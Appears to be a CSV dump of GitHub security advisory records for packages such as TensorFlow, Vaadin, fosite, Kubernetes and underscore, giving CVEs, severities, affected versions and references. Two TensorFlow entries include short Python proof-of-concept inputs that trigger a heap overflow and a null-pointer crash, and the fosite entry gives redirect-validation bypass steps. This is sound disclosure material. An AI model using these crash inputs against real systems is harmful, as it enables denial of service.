'19.3.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/keystonejs/keystone-5/security/advisories/GHSA-27g8-r9vw-765x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32624'}]","{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T20:20:03Z', 'nvd_published_at': '2021-05-24T17:15:00Z'}" +1.4.0,GHSA-c332-w4jm-55wv,2021-04-30T17:43:47Z,2021-05-04T17:42:02Z,,['CVE-2021-31409'],Regular expression Denial of Service (ReDoS) in EmailValidator class in V7 compatibility module in Vaadin 8,Unsafe validation RegEx in `EmailValidator` component in `com.vaadin:vaadin-compatibility-server` versions 8.0.0 through 8.12.4 (Vaadin versions 8.0.0 through 8.12.4) allows attackers to cause uncontrolled resource consumption by submitting malicious email addresses.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-compatibility-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.13.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/framework/security/advisories/GHSA-c332-w4jm-55wv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31409'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/framework/issues/12240'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/framework/pull/12241'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-31409'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-30T17:43:47Z', 'nvd_published_at': '2021-05-06T13:15:00Z'}" +1.4.0,GHSA-2gfx-95x2-5v3x,2021-05-18T22:36:45Z,2021-05-21T14:22:32Z,,['CVE-2021-29536'],Heap buffer overflow in `QuantizedReshape`,"### Impact +An attacker can cause a heap buffer overflow in `QuantizedReshape` by passing in invalid thresholds for the quantization: + +```python +import tensorflow as tf + +tensor = tf.constant([], dtype=tf.qint32) +shape = tf.constant([], dtype=tf.int32) +input_min = tf.constant([], dtype=tf.float32) +input_max = tf.constant([], dtype=tf.float32) + +tf.raw_ops.QuantizedReshape(tensor=tensor, shape=shape, input_min=input_min, input_max=input_max) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/a324ac84e573fba362a5e53d4e74d5de6729933e/tensorflow/core/kernels/quantized_reshape_op.cc#L38-L55) assumes that the 2 arguments are always valid scalars and tries to access the numeric value directly: + +```cc +const auto& input_min_float_tensor = ctx->input(2); +... +const float input_min_float = input_min_float_tensor.flat()(0); +const auto& input_max_float_tensor = ctx->input(3); +... +const float input_max_float = input_max_float_tensor.flat()(0); +``` + +However, if any of these tensors is empty, then `.flat()` is an empty buffer and accessing the element at position 0 results in overflow. + +### Patches +We have patched the issue in GitHub commit [a324ac84e573fba362a5e53d4e74d5de6729933e](https://github.com/tensorflow/tensorflow/commit/a324ac84e573fba362a5e53d4e74d5de6729933e). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-2gfx-95x2-5v3x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29536'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/a324ac84e573fba362a5e53d4e74d5de6729933e'}]","{'cwe_ids': ['CWE-787'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T22:36:45Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-rfq3-w54c-f9q5,2021-11-19T14:42:56Z,2021-05-24T17:00:12Z,,['CVE-2020-15233'],OAuth2 Redirect URL validity does not respect query parameters and character casing for loopback addresses,"### Impact + +[fosite#400](https://github.com/ory/fosite/pull/400) (released as v0.30.2) introduced a new feature for handling redirect URLs pointing to loopback interfaces ([rfc8252#section-7.3](https://tools.ietf.org/html/rfc8252#section-7.3)). As part of that change new behavior was introduced which failed to respect the redirect URL's (only for loopback interfaces!) query parameters + +1. Registering a client with allowed redirect URL `http://127.0.0.1/callback` +2. Performing OAuth2 flow and requesting redirect URL `http://127.0.0.1/callback?bar=foo` +3. Instead of an error, the browser is redirected to `http://127.0.0.1/callback?bar=foo` with a potentially successful OAuth2 response. + +as well as the host parameter (as long as the host is a loopback interface): + +1. Registering a client with allowed redirect URL `https://example.com/callback` +2. Performing OAuth2 flow and requesting redirect URL `http://127.0.0.1/callback` +3. Instead of an error, the browser is redirected to `http://127.0.0.1/callback` with a potentially successful OAuth2 response. + +These bugs are only applicable in scenarios where the attacker has control over the loopback interface (`localhost`, `127.0.0.1`, `[::1]`) where the browser performing the OAuth2 flow is running.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ory/fosite'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.30.3'}, {'fixed': '0.34.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ory/fosite/security/advisories/GHSA-rfq3-w54c-f9q5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15233'}, {'type': 'WEB', 'url': 'https://github.com/ory/fosite/pull/400'}, {'type': 'WEB', 'url': 'https://github.com/ory/fosite/commit/cdee51ebe721bfc8acca0fd0b86b030ca70867bf'}, {'type': 'PACKAGE', 'url': 'https://github.com/ory/fosite'}]","{'cwe_ids': ['CWE-20', 'CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T22:14:38Z', 'nvd_published_at': '2020-10-02T21:15:00Z'}" +1.4.0,GHSA-3fr8-mwpp-8h9p,2021-05-11T19:36:26Z,2021-05-17T21:01:15Z,,['CVE-2020-15500'],Cross-site scripting in TileServer GL,"An issue was discovered in server.js in TileServer GL through 3.0.0. The content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page, causing reflected XSS.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'tileserver-gl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.0.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15500'}, {'type': 'WEB', 'url': 'https://github.com/maptiler/tileserver-gl/issues/461'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/162193/Tileserver-gl-3.0.0-Cross-Site-Scripting.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-11T19:36:26Z', 'nvd_published_at': '2020-07-01T23:15:00Z'}" +1.4.0,GHSA-2x6r-7427-95cm,2021-05-21T19:01:28Z,2021-05-21T19:20:47Z,,['CVE-2020-11972'],Deserialization of Untrusted Data in Apache Camel RabbitMQ,"Apache Camel RabbitMQ enables Java deserialization by default. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.0, 3.0.0 up to 3.1.0 are affected. 2.x users should upgrade to 2.25.1, 3.x users should upgrade to 3.2.0.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.camel:camel-rabbitmq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.25.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.camel:camel-rabbitmq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11972'}, {'type': 'WEB', 'url': 'https://camel.apache.org/security/CVE-2020-11972.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2020/05/14/10'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2020/05/14/8'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T19:01:28Z', 'nvd_published_at': '2020-05-14T17:15:00Z'}" +1.4.0,GHSA-f96g-24cg-f24w,2022-11-17T18:32:56Z,2021-05-07T15:52:41Z,,['CVE-2016-11024'],SQL Injection in odata4j,odata4j 0.7.0 allows ExecuteJPQLQueryCommand.java SQL injection. NOTE: this product is apparently discontinued.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.odata4j:odata4j-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.7.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.odata4j:odata4j-dist'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.7.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.odata4j:odata4j-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-11024'}, {'type': 'WEB', 'url': 'https://groups.google.com/d/msg/odata4j-discuss/_lBwwXP30g0/Av6zkZMdBwAJ'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-06T22:00:11Z', 'nvd_published_at': '2020-03-30T20:15:00Z'}" +1.4.0,GHSA-7h5v-85w9-pq6c,2021-05-19T19:34:56Z,2021-05-19T23:01:45Z,,[],Denial of service (via resource exhaustion) due to improper input validation in third-party identifier endpoint,"### Impact +Missing input validation of some parameters on the endpoints used to confirm third-party identifiers could cause excessive use of disk space and memory leading to resource exhaustion. + +### Patches +The issue is fixed by https://github.com/matrix-org/synapse/pull/9855. + +### Workarounds +There are no known workarounds. + +### References +n/a + +### For more information +If you have any questions or comments about this advisory, email us at security@matrix.org. +",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-synapse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.33.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/security/advisories/GHSA-7h5v-85w9-pq6c'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/pull/9855'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T19:34:56Z', 'nvd_published_at': None}" +1.4.0,GHSA-hgpf-97c5-74fc,2021-04-19T23:43:02Z,2021-05-10T19:08:29Z,,['CVE-2020-7761'],Regular expression denial of service in @absolunet/kafe,This affects the package @absolunet/kafe before 3.2.10. It allows cause a denial of service when validating crafted invalid emails.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': '@absolunet/kafe'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7761'}, {'type': 'WEB', 'url': 'https://github.com/absolunet/kafe/commit/c644c798bfcdc1b0bbb1f0ca59e2e2664ff3fdd0%23diff-f0f4b5b19ad46588ae9d7dc1889f681252b0698a4ead3a77b7c7d127ee657857'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ABSOLUNETKAFE-1017403'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@absolunet/kafe'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-19T23:43:02Z', 'nvd_published_at': '2020-11-05T11:15:00Z'}" +1.4.0,GHSA-pmqp-h87c-mr78,2023-09-29T15:22:47Z,2021-05-18T15:38:48Z,,['CVE-2019-11253'],XML Entity Expansion and Improper Input Validation in Kubernetes API server,"Improper input validation in the Kubernetes API server in versions v1.0-1.12 and versions prior to v1.13.12, v1.14.8, v1.15.5, and v1.16.2 allows authorized users to send malicious YAML or JSON payloads, causing the API server to consume excessive CPU or memory, potentially crashing and becoming unavailable. Prior to v1.14.0, default RBAC policy authorized anonymous users to submit requests that could trigger this vulnerability. Clusters upgraded from a version prior to v1.14.0 keep the more permissive policy by default for backwards compatibility. + +### Specific Go Packages Affected +k8s.io/kubernetes/pkg/apiserver","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.13.12'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.14.0'}, {'fixed': '1.14.8'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.15.0'}, {'fixed': '1.15.5'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.16.0'}, {'fixed': '1.16.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-11253'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/issues/83253'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/pull/83261'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2019:3239'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2019:3811'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2019:3905'}, {'type': 'WEB', 'url': 'https://gist.github.com/bgeesaman/0e0349e94cd22c48bf14d8a9b7d6b8f2'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!topic/kubernetes-security-announce/jk8polzSUxs'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20191031-0006/'}]","{'cwe_ids': ['CWE-20', 'CWE-776'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T21:06:33Z', 'nvd_published_at': None}" +1.4.0,GHSA-84mw-34w6-2q43,2021-05-18T23:37:20Z,2021-05-21T14:20:58Z,,['CVE-2021-29516'],Null pointer dereference via invalid Ragged Tensors,"### Impact +Calling `tf.raw_ops.RaggedTensorToVariant` with arguments specifying an invalid ragged tensor results in a null pointer dereference: + +```python +import tensorflow as tf + +input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) +filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) + +tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1]) +``` + +```python +import tensorflow as tf + +input_tensor = tf.constant([], shape=[2, 2, 2, 2, 0], dtype=tf.float32) +filter_tensor = tf.constant([], shape=[0, 0, 2, 6, 2], dtype=tf.float32) + +tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 39, 34, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 1, 1]) +``` + +The implementation of [`RaggedTensorToVariant` operations](https://github.com/tensorflow/tensorflow/blob/904b3926ed1c6c70380d5313d282d248a776baa1/tensorflow/core/kernels/ragged_tensor_to_variant_op.cc#L39-L40) does not validate that the ragged tensor argument is non-empty: + +```cc + int ragged_rank = batched_ragged.ragged_rank(); + auto batched_splits_top_vec = batched_ragged.splits(0).vec(); +``` + +Since `batched_ragged` contains no elements, `batched_ragged.splits` is a null vector, thus `batched_ragged.splits(0)` will result in dereferencing `nullptr`. + +### Patches +We have patched the issue in GitHub commit [b055b9c474cd376259dde8779908f9eeaf097d93](https://github.com/tensorflow/tensorflow/commit/b055b9c474cd376259dde8779908f9eeaf097d93). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-84mw-34w6-2q43'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29516'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/b055b9c474cd376259dde8779908f9eeaf097d93'}]","{'cwe_ids': ['CWE-476'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T23:37:20Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-jqh7-w5pr-cr56,2022-09-09T20:01:21Z,2021-05-17T21:01:22Z,,['CVE-2020-8176'],Cross-site scripting in @shopify/koa-shopify-auth,A cross-site scripting vulnerability exists in koa-shopify-auth v3.1.61-v3.1.62 that allows an attacker to inject JS payloads into the `shop` parameter on the `/shopify/auth/enable_cookies` endpoint.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@shopify/koa-shopify-auth'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.61'}, {'fixed': '3.1.63'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.1.62'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8176'}, {'type': 'WEB', 'url': 'https://github.com/Shopify/quilt/pull/1455'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/881409'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-11T18:29:58Z', 'nvd_published_at': '2020-07-02T19:15:00Z'}" +1.4.0,GHSA-7mg4-w3w5-x5pc,2021-04-21T21:10:19Z,2021-05-10T18:37:47Z,,['CVE-2020-7709'],Prototype pollution in json-pointer,This affects the package json-pointer before 0.6.1. Multiple reference of object using slash is supported.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'json-pointer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7709'}, {'type': 'WEB', 'url': 'https://github.com/manuelstofer/json-pointer/pull/34'}, {'type': 'WEB', 'url': 'https://github.com/manuelstofer/json-pointer/pull/34/files'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-598862'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JSONPOINTER-596925'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/json-pointer'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T21:10:19Z', 'nvd_published_at': '2020-10-05T08:15:00Z'}" +1.4.0,GHSA-cf4h-3jhx-xvhq,2022-09-30T02:23:38Z,2021-05-06T16:09:43Z,,['CVE-2021-23358'],Arbitrary Code Execution in underscore,"The package `underscore` from 1.13.0-0 and before 1.13.0-2, from 1.3.2 and before 1.12.1 are vulnerable to Arbitrary Code Execution via the template function, particularly when a variable property is passed as an argument as it is not sanitized.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'underscore'}, 'ecosystem_specific': {'affected_functions': ['underscore.template']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.3.2'}, {'fixed': '1.12.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23358'}, {'type': 'WEB', 'url': 'https://github.com/jashkenas/underscore/pull/2917'}, {'type': 'WEB', 'url': 'https://github.com/jashkenas/underscore/commit/4c73526d43838ad6ab43a6134728776632adeb66'}, {'type': 'PACKAGE', 'url': 'https://github.com/jashkenas/underscore'}, {'type': 'WEB', 'url': 'https://github.com/jashkenas/underscore/blob/master/modules/template.js%23L71'}, {'type': 'WEB', 'url': 'https://github.com/jashkenas/underscore/releases/tag/1.12.1'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5df90c46f7000c4aab246e947f62361ecfb849c5a553dcdb0ef545e1@%3Cissues.cordova.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r770f910653772317b117ab4472b0a32c266ee4abbafda28b8a6f9306@%3Cissues.cordova.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raae088abdfa4fbd84e1d19d7a7ffe52bf8e426b83e6599ea9a734dba@%3Cissues.cordova.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbc84926bacd377503a3f5c37b923c1931f9d343754488d94e6f08039@%3Cissues.cordova.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re69ee408b3983b43e9c4a82a9a17cbbf8681bb91a4b61b46f365aeaf@%3Cissues.cordova.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/03/msg00038.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EOKATXXETD2PF3OR36Q5PD2VSVAR6J5Z/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGEE7U4Z655A2MK5EW4UQQZ7B64XJWBV/'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1081504'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBJASHKENAS-1081505'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1081503'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-UNDERSCORE-1080984'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4883'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/underscore'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2021-14'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-31T21:59:00Z', 'nvd_published_at': '2021-03-29T14:15:00Z'}" +1.4.0,GHSA-3x58-xr87-2fcj,2021-05-18T21:05:51Z,2021-05-18T21:07:37Z,,['CVE-2021-29272'],Cross-site scripting in bluemonday,"bluemonday before 1.0.5 allows XSS because certain Go lowercasing converts an uppercase Cyrillic character, 